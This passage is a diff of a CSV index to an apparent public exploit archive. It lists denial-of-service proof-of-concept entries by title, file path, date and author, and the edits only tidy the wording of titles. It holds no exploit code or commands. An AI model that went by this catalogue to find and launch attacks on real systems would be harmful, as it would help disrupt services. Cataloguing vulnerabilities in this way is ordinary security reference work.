Overflow",2010-10-28,n00b,multiple,dos,0 15356,platforms/windows/dos/15356.pl,"yPlay 2.4.5 - Denial of Service",2010-10-30,"MOHAMED ABDI",windows,dos,0 15378,platforms/windows/dos/15378.py,"Sybase Advantage Data Architect - '.SQL' Format Heap Overflow",2010-11-01,d0lc3,windows,dos,0 @@ -1837,7 +1839,7 @@ id,file,description,date,author,platform,type,port 15738,platforms/windows/dos/15738.pl,"Digital Audio Editor 7.6.0.237 - Local Crash (PoC)",2010-12-15,h1ch4m,windows,dos,0 15739,platforms/windows/dos/15739.pl,"Easy DVD Creator - Local Crash (PoC)",2010-12-15,h1ch4m,windows,dos,0 15750,platforms/windows/dos/15750.py,"Solar FTP Server 2.0 - Multiple Commands Denial of Service",2010-12-16,modpr0be,windows,dos,0 -15758,platforms/win_x86/dos/15758.c,"Microsoft Windows - Win32k Pointer Dereferencement PoC (MS10-098)",2010-12-17,"Stefan LE BERRE",win_x86,dos,0 +15758,platforms/win_x86/dos/15758.c,"Microsoft Windows - Win32k Pointer Dereferencement (PoC) (MS10-098)",2010-12-17,"Stefan LE BERRE",win_x86,dos,0 15767,platforms/windows/dos/15767.py,"Ecava IntegraXor Remote - ActiveX Buffer Overflow (PoC)",2010-12-18,"Jeremy Brown",windows,dos,0 15786,platforms/windows/dos/15786.py,"Accmeware MP3 Joiner Pro 5.0.9 - Denial of Service (PoC)",2010-12-20,0v3r,windows,dos,0 15787,platforms/windows/dos/15787.py,"Accmeware MP3 Speed 5.0.9 - Denial of Service (PoC)",2010-12-20,0v3r,windows,dos,0 @@ -1897,12 +1899,12 @@ id,file,description,date,author,platform,type,port 16216,platforms/linux/dos/16216.txt,"RedHat Linux - Stickiness of /tmp Exploit",2011-02-23,"Tavis Ormandy",linux,dos,0 16230,platforms/windows/dos/16230.py,"Victory FTP Server 5.0 - Denial of Service",2011-02-24,"C4SS!0 G0M3S",windows,dos,0 16234,platforms/netware/dos/16234.rb,"Novell Netware - RPC XNFS xdrDecodeString",2011-02-24,"Francis Provencher",netware,dos,0 -16237,platforms/windows/dos/16237.py,"Elecard MPEG Player 5.7 - Local Buffer Overflow PoC (SEH)",2011-02-24,badc0re,windows,dos,0 +16237,platforms/windows/dos/16237.py,"Elecard MPEG Player 5.7 - Local Buffer Overflow (PoC) (SEH)",2011-02-24,badc0re,windows,dos,0 16248,platforms/windows/dos/16248.pl,"eXPert PDF Reader 4.0 - Null Pointer Dereference and Heap Corruption",2011-02-26,LiquidWorm,windows,dos,0 16255,platforms/windows/dos/16255.pl,"Magic Music Editor - '.cda' Denial of Service",2011-02-28,AtT4CKxT3rR0r1ST,windows,dos,0 16260,platforms/windows/dos/16260.py,"Quick 'n Easy FTP Server 3.2 - Denial of Service",2011-02-28,clshack,windows,dos,0 16261,platforms/multiple/dos/16261.txt,"PHP Exif Extension - 'exif_read_data()' Function Remote Denial of Service",2011-02-28,"_ikki and paradoxengine",multiple,dos,0 -16262,platforms/windows/dos/16262.c,"Microsoft Windows XP - WmiTraceMessageVa Integer Truncation PoC (MS11-011)",2011-03-01,"Nikita Tarakanov",windows,dos,0 +16262,platforms/windows/dos/16262.c,"Microsoft Windows XP - WmiTraceMessageVa Integer Truncation (PoC) (MS11-011)",2011-03-01,"Nikita Tarakanov",windows,dos,0 16263,platforms/linux/dos/16263.c,"Linux Kernel 2.6.37 - Local Kernel Denial of Service (1)",2011-03-02,prdelka,linux,dos,0 16270,platforms/linux/dos/16270.c,"vsftpd 2.3.2 - Denial of Service",2011-03-02,"Maksymilian Arciemowicz",linux,dos,0 16284,platforms/unix/dos/16284.rb,"Subversion - Date Svnserve (Metasploit)",2010-08-07,Metasploit,unix,dos,0 @@ -1936,14 +1938,14 @@ id,file,description,date,author,platform,type,port 17074,platforms/windows/dos/17074.py,"Winamp 5.61 - AVI Denial of Service (PoC)",2011-03-29,BraniX,windows,dos,0 17075,platforms/windows/dos/17075.py,"Media Player Classic Home Cinema 1.5.0.2827 - '.avi' Denial of Service (PoC)",2011-03-30,BraniX,windows,dos,0 17145,platforms/windows/dos/17145.pl,"Vallen Zipper 2.30 - '.zip' Heap Overflow",2011-04-11,"C4SS!0 G0M3S",windows,dos,0 -17087,platforms/windows/dos/17087.pl,"Real player 14.0.2.633 - Buffer Overflow / Denial of ServiceExploit",2011-04-01,^Xecuti0N3r,windows,dos,0 +17087,platforms/windows/dos/17087.pl,"Real player 14.0.2.633 - Buffer Overflow / Denial of Service",2011-04-01,^Xecuti0N3r,windows,dos,0 17089,platforms/windows/dos/17089.pl,"GOM Media Player 2.1.6.3499 - Buffer Overflow / Denial of Service",2011-04-01,^Xecuti0N3r,windows,dos,0 17097,platforms/bsd/dos/17097.c,"IPComp - encapsulation Unauthenticated kernel memory Corruption",2011-04-01,"Tavis Ormandy",bsd,dos,0 17120,platforms/multiple/dos/17120.c,"GNU glibc < 2.12.2 - 'fnmatch()' Function Stack Corruption",2011-02-25,"Simon Berry-Byrne",multiple,dos,0 17133,platforms/windows/dos/17133.c,"Microsoft Windows XP - 'afd.sys' Local Kernel Denial of Service",2011-04-08,"Lufeng Li",windows,dos,0 17140,platforms/multiple/dos/17140.txt,"Libmodplug ReadS3M - Stack Overflow",2011-04-09,"SEC Consult",multiple,dos,0 -17142,platforms/windows/dos/17142.py,"IrfanView 4.28 - .ICO With Transparent Colour Denial of Service / Remote Denial of Service",2011-04-10,BraniX,windows,dos,0 -17143,platforms/windows/dos/17143.py,"IrfanView 4.28 - .ICO Without Transparent Colour Denial of Service / Remote Denial of Service",2011-04-10,BraniX,windows,dos,0 +17142,platforms/windows/dos/17142.py,"IrfanView 4.28 - '.ICO' With Transparent Colour Denial of Service / Remote Denial of Service",2011-04-10,BraniX,windows,dos,0 +17143,platforms/windows/dos/17143.py,"IrfanView 4.28 - '.ICO' Without Transparent Colour Denial of Service / Remote Denial of Service",2011-04-10,BraniX,windows,dos,0 17159,platforms/windows/dos/17159.txt,"Microsoft Host Integration Server 8.5.4224.0 - Denial of Service",2011-04-12,"Luigi Auriemma",windows,dos,0 17160,platforms/windows/dos/17160.txt,"Microsoft Reader 2.1.1.3143 - Integer Overflow (1)",2011-04-12,"Luigi Auriemma",windows,dos,0 17161,platforms/windows/dos/17161.txt,"Microsoft Reader 2.1.1.3143 - Heap Overflow",2011-04-12,"Luigi Auriemma",windows,dos,0 @@ -1961,7 +1963,7 @@ id,file,description,date,author,platform,type,port 17287,platforms/windows/dos/17287.mid,"Winamp 5.61 - 'in_midi' Component heap Overflow (crash only)",2011-05-15,"Alexander Gavrun",windows,dos,0 17291,platforms/windows/dos/17291.py,"Steam Software - Denial of Service",2011-05-16,david.r.klein,windows,dos,0 17298,platforms/netware/dos/17298.txt,"Novell Netware eDirectory - Denial of Service",2011-05-16,nSense,netware,dos,0 -17305,platforms/windows/dos/17305.py,"Microsoft Windows Vista/Server 2008 - 'nsiproxy.sys' Local Kernel Denial of Service",2011-05-18,"Lufeng Li",windows,dos,0 +17305,platforms/windows/dos/17305.py,"Microsoft Windows Vista/2008 - 'nsiproxy.sys' Local Kernel Denial of Service",2011-05-18,"Lufeng Li",windows,dos,0 17351,platforms/hardware/dos/17351.py,"iPhone4 FTP Server 1.0 - Empty CWD-RETR Remote Crash",2011-05-31,offsetIntruder,hardware,dos,0 17353,platforms/hardware/dos/17353.pl,"Brother HL-5370DW - series Authentication Bypass printer flooder",2011-05-31,chrisB,hardware,dos,0 18716,platforms/windows/dos/18716.txt,"BulletProof FTP Client 2010 - Buffer Overflow",2012-04-08,Vulnerability-Lab,windows,dos,0 @@ -1983,7 +1985,7 @@ id,file,description,date,author,platform,type,port 17476,platforms/windows/dos/17476.rb,"Microsoft IIS 7.0 FTP Server - Stack Exhaustion Denial of Service (MS09-053) (Metasploit)",2011-07-03,"Myo Soe",windows,dos,0 17509,platforms/windows/dos/17509.pl,"ZipWiz 2005 5.0 - '.zip' Buffer Corruption Exploit",2011-07-08,"C4SS!0 G0M3S",windows,dos,0 17497,platforms/windows/dos/17497.txt,"ESTsoft ALPlayer 2.0 - ASX Playlist File Handling Buffer Overflow",2011-07-06,LiquidWorm,windows,dos,0 -17501,platforms/hardware/dos/17501.py,"D-Link DSL-2650U - Denial of Service/PoC",2011-07-07,"Li'el Fridman",hardware,dos,0 +17501,platforms/hardware/dos/17501.py,"D-Link DSL-2650U - Denial of Service (PoC)",2011-07-07,"Li'el Fridman",hardware,dos,0 17512,platforms/windows/dos/17512.pl,"ZipItFast 3.0 - '.zip' Heap Overflow",2011-07-08,"C4SS!0 G0M3S",windows,dos,0 17544,platforms/windows/dos/17544.txt,"GDI+ - 'gdiplus.dll' CreateDashedPath Integer Overflow",2011-07-18,Abysssec,windows,dos,0 17549,platforms/multiple/dos/17549.txt,"Lotus Domino SMTP Router & Email Server and Client - Denial of Service",2011-07-19,Unknown,multiple,dos,0 @@ -2046,10 +2048,10 @@ id,file,description,date,author,platform,type,port 17963,platforms/windows/dos/17963.txt,"atvise webMI2ADS Web Server 1.0 - Multiple Vulnerabilities",2011-10-10,"Luigi Auriemma",windows,dos,0 17964,platforms/windows/dos/17964.txt,"IRAI AUTOMGEN 8.0.0.7 - Use-After-Free",2011-10-10,"Luigi Auriemma",windows,dos,0 17965,platforms/windows/dos/17965.txt,"OPC Systems.NET 4.00.0048 - Denial of Service",2011-10-10,"Luigi Auriemma",windows,dos,0 -17978,platforms/windows/dos/17978.txt,"Microsoft Windows - '.fon' Kernel-Mode Buffer Overrun PoC (MS11-077)",2011-10-13,"Byoungyoung Lee",windows,dos,0 +17978,platforms/windows/dos/17978.txt,"Microsoft Windows - '.fon' Kernel-Mode Buffer Overrun (PoC) (MS11-077)",2011-10-13,"Byoungyoung Lee",windows,dos,0 17981,platforms/windows/dos/17981.py,"Microsoft Windows - TCP/IP Stack Denial of Service (MS11-064)",2011-10-15,"Byoungyoung Lee",windows,dos,0 17982,platforms/windows/dos/17982.pl,"BlueZone Desktop - '.zap' file Local Denial of Service",2011-10-15,Silent_Dream,windows,dos,0 -18006,platforms/windows/dos/18006.html,"Opera 11.52 - PoC Denial of Service",2011-10-20,pigtail23,windows,dos,0 +18006,platforms/windows/dos/18006.html,"Opera 11.52 - Denial of Service (PoC)",2011-10-20,pigtail23,windows,dos,0 18007,platforms/windows/dos/18007.txt,"Oracle DataDirect - Multiple Native Wire Protocol ODBC Drivers HOST Attribute Stack Based Buffer Overflow",2011-10-20,rgod,windows,dos,0 18008,platforms/windows/dos/18008.html,"Opera 11.52 - Stack Overflow",2011-10-20,pigtail23,windows,dos,0 18011,platforms/windows/dos/18011.txt,"UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow",2011-10-20,DiGMi,windows,dos,0 @@ -2057,7 +2059,7 @@ id,file,description,date,author,platform,type,port 18017,platforms/windows/dos/18017.py,"Cyclope Internet Filtering Proxy 4.0 - CEPMServer.exe Denial of Service (PoC)",2011-10-21,loneferret,windows,dos,0 18019,platforms/windows/dos/18019.txt,"Google Chrome - Killing Thread (PoC)",2011-10-22,pigtail23,windows,dos,0 18023,platforms/php/dos/18023.java,"phpLDAPadmin 0.9.4b - Denial of Service",2011-10-23,Alguien,php,dos,0 -18024,platforms/windows/dos/18024.txt,"Microsoft Win32k - Null Pointer De-reference PoC (MS11-077)",2011-10-23,KiDebug,windows,dos,0 +18024,platforms/windows/dos/18024.txt,"Microsoft Win32k - Null Pointer De-reference (PoC) (MS11-077)",2011-10-23,KiDebug,windows,dos,0 18025,platforms/multiple/dos/18025.txt,"Google Chrome - Denial of Service",2011-10-23,"Prashant Uniyal",multiple,dos,0 18043,platforms/windows/dos/18043.py,"GFI Faxmaker Fax Viewer 10.0 (build 237) - Denial of Service (PoC)",2011-10-28,loneferret,windows,dos,0 40298,platforms/windows/dos/40298.py,"Goron WebServer 2.0 - Multiple Vulnerabilities",2016-08-29,"Guillaume Kaddouch",windows,dos,80 @@ -2172,7 +2174,7 @@ id,file,description,date,author,platform,type,port 18739,platforms/windows/dos/18739.txt,"IrfanView FlashPix PlugIn - Decompression Heap Overflow",2012-04-14,"Francis Provencher",windows,dos,0 18751,platforms/hardware/dos/18751.txt,"Samsung D6000 TV - Multiple Vulnerabilities",2012-04-19,"Luigi Auriemma",hardware,dos,0 18754,platforms/multiple/dos/18754.php,"LibreOffice 3.5.2.2 - Memory Corruption",2012-04-19,shinnai,multiple,dos,0 -18755,platforms/windows/dos/18755.c,"Microsoft Windows - 'afd.sys' PoC (MS11-046)",2012-04-19,fb1h2s,windows,dos,0 +18755,platforms/windows/dos/18755.c,"Microsoft Windows - 'afd.sys' (PoC) (MS11-046)",2012-04-19,fb1h2s,windows,dos,0 18756,platforms/multiple/dos/18756.txt,"OpenSSL - ASN1 BIO Memory Corruption",2012-04-19,"Tavis Ormandy",multiple,dos,0 18757,platforms/windows/dos/18757.txt,"VideoLAN VLC Media Player 2.0.1 - '.mp4' Crash (PoC)",2012-04-19,"Senator of Pirates",windows,dos,0 18758,platforms/multiple/dos/18758.txt,"Wireshark - 'call_dissector()' Null Pointer Dereference Denial of Service",2012-04-19,Wireshark,multiple,dos,0 @@ -2195,7 +2197,7 @@ id,file,description,date,author,platform,type,port 18878,platforms/windows/dos/18878.txt,"Pro-face Pro-Server EX WinGP PC Runtime - Multiple Vulnerabilities",2012-05-14,"Luigi Auriemma",windows,dos,0 18890,platforms/multiple/dos/18890.txt,"Java - Trigerring Java Code from a .SVG Image",2012-05-16,"Nicolas Gregoire",multiple,dos,0 18909,platforms/php/dos/18909.php,"PHP 5.4.3 - wddx_serialize_* / stream_bucket_* Variant Object Null Ptr Dereference",2012-05-21,condis,php,dos,0 -18894,platforms/windows/dos/18894.txt,"Microsoft Windows XP - Keyboard Layouts Pool Corruption LPE PoC (MS12-034)",2012-05-18,Cr4sh,windows,dos,0 +18894,platforms/windows/dos/18894.txt,"Microsoft Windows XP - Keyboard Layouts Pool Corruption LPE (PoC) (MS12-034)",2012-05-18,Cr4sh,windows,dos,0 18902,platforms/windows/dos/18902.rb,"Real-DRAW PRO 5.2.4 - Import File Crash",2012-05-21,"Ahmed Elhady Mohamed",windows,dos,0 18903,platforms/windows/dos/18903.rb,"DVD-Lab Studio 1.25 - '.DAL' File Open Crash",2012-05-21,"Ahmed Elhady Mohamed",windows,dos,0 18910,platforms/php/dos/18910.php,"PHP 5.4.3 - (com_event_sink) Denial of Service",2012-05-21,condis,php,dos,0 @@ -2231,7 +2233,7 @@ id,file,description,date,author,platform,type,port 19098,platforms/multiple/dos/19098.txt,"Apple iTunes 10.6.1.7 - '.m3u' Playlist File Walking Heap Buffer Overflow",2012-06-13,LiquidWorm,multiple,dos,0 19385,platforms/windows/dos/19385.txt,"IrfanView 4.33 - '.DJVU' Image Processing Heap Overflow",2012-06-24,"Francis Provencher",windows,dos,0 19117,platforms/bsd/dos/19117.c,"Linux Kernel 2.0/2.1 (Digital UNIX 4.0 D / FreeBSD 2.2.4 / HP HP-UX 10.20/11.0 / IBM AIX 3.2.5 / NetBSD 1.2 / Solaris 2.5.1) - Smurf Denial of Service",1998-01-05,"T. Freak",bsd,dos,0 -19137,platforms/hardware/dos/19137.rb,"Wyse - Machine Remote Power off (DOS) without any Privilege (Metasploit)",2012-06-14,it.solunium,hardware,dos,0 +19137,platforms/hardware/dos/19137.rb,"Wyse - Unauthenticated Machine Remote Power Off )Denial of Service) (Metasploit)",2012-06-14,it.solunium,hardware,dos,0 19413,platforms/windows/dos/19413.c,"Microsoft Windows 95/98 / NT Enterprise Server 4.0 SP5 / NT Terminal Server 4.0 SP4 / NT Workstation 4.0 SP5 - Denial of Service (1)",1999-07-03,Coolio,windows,dos,0 19391,platforms/windows/dos/19391.py,"Slimpdf Reader 1.0 - Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 19392,platforms/windows/dos/19392.py,"Able2Extract and Able2Extract Server 6.0 - Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 @@ -2355,7 +2357,7 @@ id,file,description,date,author,platform,type,port 19817,platforms/ultrix/dos/19817.txt,"Data General DG/UX 5.4 - inetd Service Exhaustion Denial of Service",2000-03-16,"The Unicorn",ultrix,dos,0 19818,platforms/linux/dos/19818.c,"Linux Kernel 2.2.12/2.2.14/2.3.99 (RedHat 6.x) - Socket Denial of Service",2000-03-23,"Jay Fenlason",linux,dos,0 19820,platforms/windows/dos/19820.txt,"AnalogX SimpleServer:WWW 1.0.3 - Denial of Service",2000-03-25,"Presto Chango",windows,dos,0 -19827,platforms/windows/dos/19827.txt,"Microsoft Windows Server 2000/NT 4.0 - TCP/IP Printing Service Denial of Service",2000-03-30,"Ussr Labs",windows,dos,0 +19827,platforms/windows/dos/19827.txt,"Microsoft Windows NT 4/2000 - TCP/IP Printing Service Denial of Service",2000-03-30,"Ussr Labs",windows,dos,0 19963,platforms/windows/dos/19963.txt,"PHP 6.0 - openssl_verify() Local Buffer Overflow (PoC)",2012-07-20,"Yakir Wizman",windows,dos,0 19834,platforms/windows/dos/19834.txt,"Real Networks RealPlayer 6/7 - Location Buffer Overflow",2000-04-03,"Adam Muntner",windows,dos,0 19835,platforms/windows/dos/19835.txt,"SalesLogix Corporation eViewer 1.0 - Denial of Service",2000-03-31,"Todd Beebe",windows,dos,0 @@ -2463,7 +2465,7 @@ id,file,description,date,author,platform,type,port 20464,platforms/windows/dos/20464.py,"Spytech NetVizor 6.1 - 'services.exe' Denial of Service",2012-08-12,loneferret,windows,dos,0 20470,platforms/windows/dos/20470.txt,"IBM DB2 - Universal Database for Windows NT 6.1/7.1 SQL Denial of Service",2000-12-05,benjurry,windows,dos,0 20473,platforms/hardware/dos/20473.pl,"Cisco Catalyst 4000 4.x/5.x / Catalyst 5000 4.5/5.x / Catalyst 6000 5.x - Memory Leak Denial of Service",2000-12-06,blackangels,hardware,dos,0 -20479,platforms/linux/dos/20479.pl,"Pure-FTPd 1.0.21 (CentOS 6.2 / Ubuntu 8.04) - Crash PoC (Null Pointer Dereference)",2012-08-13,kingcope,linux,dos,0 +20479,platforms/linux/dos/20479.pl,"Pure-FTPd 1.0.21 (CentOS 6.2 / Ubuntu 8.04) - Null Pointer Dereference Crash (PoC)",2012-08-13,kingcope,linux,dos,0 20484,platforms/windows/dos/20484.txt,"OReilly WebSite 1.x/2.0 - win-c-sample.exe Buffer Overflow",1997-01-06,"Solar Designer",windows,dos,0 20487,platforms/hardware/dos/20487.pl,"Watchguard SOHO 2.2 - Denial of Service",2000-12-08,"Filip Maertens",hardware,dos,0 20494,platforms/linux/dos/20494.pl,"RedHat Linux 7.0 - Roaring Penguin PPPoE Denial of Service",2000-12-11,dethy,linux,dos,0 @@ -2518,11 +2520,11 @@ id,file,description,date,author,platform,type,port 20784,platforms/windows/dos/20784.cpp,"Wireshark 1.8.2 / 1.6.0 - Buffer Overflow (PoC)",2012-08-24,X-h4ck,windows,dos,0 20792,platforms/multiple/dos/20792.txt,"Mercury/NLM 1.4 - Buffer Overflow",2001-04-21,"Przemyslaw Frasunek",multiple,dos,0 20802,platforms/windows/dos/20802.c,"Microsoft IIS 2.0/3.0 - Long URL Denial of Service",1997-06-21,"Andrea Arcangeli",windows,dos,0 -20810,platforms/multiple/dos/20810.c,"FreeBSD 2.x / HP-UX 9/10/11 / kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (1)",1997-11-20,m3lt,multiple,dos,0 -20811,platforms/multiple/dos/20811.cpp,"FreeBSD 2.x / HP-UX 9/10/11 / kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (2)",1997-11-20,"Konrad Malewski",multiple,dos,0 -20812,platforms/windows/dos/20812.c,"FreeBSD 2.x / HP-UX 9/10/11 / kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (3)",1997-11-20,m3lt,windows,dos,0 -20813,platforms/multiple/dos/20813.c,"FreeBSD 2.x / HP-UX 9/10/11 / kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (4)",1997-11-20,MondoMan,multiple,dos,0 -20814,platforms/windows/dos/20814.c,"FreeBSD 2.x / HP-UX 9/10/11 / kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (5)",1997-11-20,"Dejan Levaja",windows,dos,0 +20810,platforms/multiple/dos/20810.c,"FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (1)",1997-11-20,m3lt,multiple,dos,0 +20811,platforms/multiple/dos/20811.cpp,"FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (2)",1997-11-20,"Konrad Malewski",multiple,dos,0 +20812,platforms/windows/dos/20812.c,"FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (3)",1997-11-20,m3lt,windows,dos,0 +20813,platforms/multiple/dos/20813.c,"FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (4)",1997-11-20,MondoMan,multiple,dos,0 +20814,platforms/windows/dos/20814.c,"FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (5)",1997-11-20,"Dejan Levaja",windows,dos,0 20821,platforms/hardware/dos/20821.txt,"Cisco HSRP - Denial of Service",2001-05-03,bashis,hardware,dos,0 20824,platforms/hardware/dos/20824.txt,"Cisco Catalyst 2900 12.0 - (5.2)XU SNMP Empty UDP Packet Denial of Service",2001-05-03,bashis,hardware,dos,0 20827,platforms/multiple/dos/20827.pl,"Hughes Technologies DSL_Vdns 1.0 - Denial of Service",2001-05-07,neme-dhc,multiple,dos,0 @@ -2570,7 +2572,7 @@ id,file,description,date,author,platform,type,port 21099,platforms/windows/dos/21099.c,"Microsoft Windows Server 2000 - RunAs Service Denial of Service",2001-12-11,Camisade,windows,dos,0 21103,platforms/hardware/dos/21103.c,"D-Link Dl-704 2.56 b5 - IP Fragment Denial of Service",2000-05-23,phonix,hardware,dos,0 21122,platforms/linux/dos/21122.sh,"Linux Kernel 2.2 / 2.4 - Deep Symbolic Link Denial of Service",2001-10-18,Nergal,linux,dos,0 -21123,platforms/windows/dos/21123.txt,"Microsoft Windows Server 2000/NT - Terminal Server Service RDP Denial of Service",2001-10-18,"Luciano Martins",windows,dos,0 +21123,platforms/windows/dos/21123.txt,"Microsoft Windows NT / 2000 - Terminal Server Service RDP Denial of Service",2001-10-18,"Luciano Martins",windows,dos,0 21126,platforms/multiple/dos/21126.c,"6Tunnel 0.6/0.7/0.8 - Connection Close State Denial of Service",2001-10-23,awayzzz,multiple,dos,0 21131,platforms/windows/dos/21131.txt,"Microsoft Windows XP/2000 - GDI Denial of Service",2001-10-29,PeterB,windows,dos,0 21147,platforms/windows/dos/21147.txt,"WAP Proof 2008 - Denial of Service",2012-09-08,"Orion Einfold",windows,dos,0 @@ -2596,8 +2598,8 @@ id,file,description,date,author,platform,type,port 21236,platforms/unix/dos/21236.txt,"DNRD 1.x/2.x - DNS Request/Reply Denial of Service",2002-01-20,"Andrew Griffiths",unix,dos,0 21237,platforms/windows/dos/21237.pl,"Cyberstop Web Server 0.1 - Long Request Denial of Service",2002-01-22,"Alex Hernandez",windows,dos,0 21240,platforms/windows/dos/21240.txt,"Microsoft Windows XP - '.Manifest' Denial of Service",2002-01-21,mosestycoon,windows,dos,0 -21245,platforms/windows/dos/21245.c,"Microsoft Windows Server 2000/NT 4 - TCP Stack Denial of Service (1)",2001-04-13,3APA3A,windows,dos,0 -21246,platforms/windows/dos/21246.c,"Microsoft Windows Server 2000/NT 4 - TCP Stack Denial of Service (2)",2001-04-13,3APA3A,windows,dos,0 +21245,platforms/windows/dos/21245.c,"Microsoft Windows NT 4/2000 - TCP Stack Denial of Service (1)",2001-04-13,3APA3A,windows,dos,0 +21246,platforms/windows/dos/21246.c,"Microsoft Windows NT 4/2000 - TCP Stack Denial of Service (2)",2001-04-13,3APA3A,windows,dos,0 21261,platforms/unix/dos/21261.txt,"Tru64 - Malformed TCP Packet Denial of Service",2002-01-31,"Luca Papotti",unix,dos,0 21262,platforms/linux/dos/21262.txt,"kicq 2.0.0b1 - Invalid ICQ Packet Denial of Service",2002-02-02,"Rafael San Miguel Carrasco",linux,dos,0 21275,platforms/osx/dos/21275.c,"ICQ For Mac OSX 2.6 Client - Denial of Service",2002-02-05,Stephen,osx,dos,0 @@ -2675,8 +2677,8 @@ id,file,description,date,author,platform,type,port 21737,platforms/windows/dos/21737.txt,"Cyme ChartFX Client Server - ActiveX Control Array Indexing",2012-10-04,"Francis Provencher",windows,dos,0 21739,platforms/windows/dos/21739.pl,"JPEGsnoop 1.5.2 - WriteAV Crash (PoC)",2012-10-04,"Jean Pascal Pereira",windows,dos,0 21741,platforms/windows/dos/21741.txt,"XnView 1.99.1 - '.JLS' File Decompression Heap Overflow",2012-10-04,"Joseph Sheridan",windows,dos,0 -21746,platforms/windows/dos/21746.c,"Microsoft Windows Server 2000/NT 4/XP - Network Share Provider SMB Request Buffer Overflow (1)",2002-08-22,"Frederic Deletang",windows,dos,0 -21747,platforms/windows/dos/21747.txt,"Microsoft Windows Server 2000/NT 4/XP - Network Share Provider SMB Request Buffer Overflow (2)",2002-08-22,zamolx3,windows,dos,0 +21746,platforms/windows/dos/21746.c,"Microsoft Windows XP/2000/NT 4 - Network Share Provider SMB Request Buffer Overflow (1)",2002-08-22,"Frederic Deletang",windows,dos,0 +21747,platforms/windows/dos/21747.txt,"Microsoft Windows XP/2000/NT 4 - Network Share Provider SMB Request Buffer Overflow (2)",2002-08-22,zamolx3,windows,dos,0 21756,platforms/hardware/dos/21756.txt,"Belkin F5D6130 Wireless Network Access Point - SNMP Request Denial of Service",2002-08-26,wlanman,hardware,dos,0 21770,platforms/hardware/dos/21770.c,"Cisco VPN 3000 Series Concentrator Client - Authentication Denial of Service",2002-09-03,Phenoelit,hardware,dos,0 21775,platforms/linux/dos/21775.c,"SWS Simple Web Server 0.0.3/0.0.4/0.1 - New Line Denial of Service",2002-09-02,saman,linux,dos,0 @@ -2746,7 +2748,7 @@ id,file,description,date,author,platform,type,port 22110,platforms/php/dos/22110.txt,"PHP-Nuke 6.0 - modules.php Denial of Service",2002-12-23,"Ing. Bernardo Lopez",php,dos,0 22117,platforms/windows/dos/22117.txt,"iCal 3.7 - Malformed HTTP Request Denial of Service",2003-01-03,"securma massine",windows,dos,0 22118,platforms/windows/dos/22118.txt,"iCal 3.7 - Remote Buffer Overflow",2003-01-03,"securma massine",windows,dos,0 -22119,platforms/windows/dos/22119.html,"Microsoft PoCket Internet Explorer 3.0 - Denial of Service",2003-01-03,"Christopher Sogge Røtnes",windows,dos,0 +22119,platforms/windows/dos/22119.html,"Microsoft Pocket Internet Explorer 3.0 - Denial of Service",2003-01-03,"Christopher Sogge Røtnes",windows,dos,0 22121,platforms/windows/dos/22121.pl,"EType EServ 2.9x - FTP Remote Denial of Service",2003-01-04,D4rkGr3y,windows,dos,0 22122,platforms/windows/dos/22122.pl,"EType EServ 2.9x - POP3 Remote Denial of Service",2003-01-04,D4rkGr3y,windows,dos,0 22123,platforms/windows/dos/22123.pl,"EType EServ 2.9x - SMTP Remote Denial of Service",2003-01-04,D4rkGr3y,windows,dos,0 @@ -3213,7 +3215,7 @@ id,file,description,date,author,platform,type,port 24468,platforms/windows/dos/24468.pl,"KMPlayer - Denial of Service",2013-02-10,Jigsaw,windows,dos,0 24511,platforms/windows/dos/24511.txt,"SAP NetWeaver Message Server - Multiple Vulnerabilities",2013-02-17,"Core Security",windows,dos,0 24474,platforms/windows/dos/24474.py,"Schneider Electric Accutech Manager - Heap Overflow (PoC)",2013-02-10,"Evren Yalçın",windows,dos,0 -24485,platforms/windows/dos/24485.txt,"Microsoft Windows - HWND_BROADCAST PoC (MS13-005)",2013-02-11,0vercl0k,windows,dos,0 +24485,platforms/windows/dos/24485.txt,"Microsoft Windows - HWND_BROADCAST (PoC) (MS13-005)",2013-02-11,0vercl0k,windows,dos,0 24486,platforms/multiple/dos/24486.txt,"Google Chrome - Silent HTTP Authentication",2013-02-11,T355,multiple,dos,0 24487,platforms/linux/dos/24487.py,"cURL - Buffer Overflow",2013-02-11,Volema,linux,dos,0 24556,platforms/windows/dos/24556.py,"Hanso Player 2.1.0 - '.m3u' Buffer Overflow",2013-03-01,metacom,windows,dos,0 @@ -3741,7 +3743,7 @@ id,file,description,date,author,platform,type,port 29618,platforms/windows/dos/29618.c,"News File Grabber 4.1.0.1 - Subject Line Stack Buffer Overflow (2)",2007-02-19,Marsu,windows,dos,0 29620,platforms/osx/dos/29620.txt,"Apple Mac OSX 10.4.8 - ImageIO GIF Image Integer Overflow",2007-02-20,"Tom Ferris",osx,dos,0 29671,platforms/windows/dos/29671.txt,"Avira Secure Backup 1.0.0.1 Build 3616 - '.reg' Buffer Overflow",2013-11-18,"Julien Ahrens",windows,dos,0 -29791,platforms/windows/dos/29791.pl,"Boilsoft RM TO MP3 Converter 1.72 - '.wav' Crash PoC",2013-11-23,"Akin Tosunlar",windows,dos,0 +29791,platforms/windows/dos/29791.pl,"Boilsoft RM TO MP3 Converter 1.72 - '.wav' Crash (PoC)",2013-11-23,"Akin Tosunlar",windows,dos,0 29659,platforms/windows/dos/29659.pl,"Microsoft Windows XP/2003 - Explorer .WMF File Handling Denial of 